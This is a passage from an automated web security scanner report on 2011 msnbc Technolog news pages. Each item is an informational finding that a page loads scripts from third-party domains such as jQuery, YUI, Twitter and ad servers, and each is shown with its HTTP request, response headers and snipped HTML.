</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.322. http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=271
Date: Sun, 30 Jan 2011 02:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 171224

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Did spam text
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/2bec8693ba2bbf1b5e59fba85e1eaa8e41e25f54.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.323. http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=281
Date: Sun, 30 Jan 2011 02:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77306

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Jon Stewart q
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.324. http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=275
Date: Sun, 30 Jan 2011 02:19:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128366

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Net-less Egyp
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/2bec8693ba2bbf1b5e59fba85e1eaa8e41e25f54.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/c35b2b2ba0e917395006637b1d563433bdaa5966.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.325. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=263
Date: Sun, 30 Jan 2011 02:19:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64836

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.326. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 29 Jan 2011 23:51:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64795

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.327. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
Content-Type: text/html
Cache-Control: max-age=298
Date: Sun, 30 Jan 2011 01:22:07 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/04932de48216d4ef67a832389ca85ffa4b92a99a.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/5b1bb6f5f29a6defa4ad5f0872c615f92d244547.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
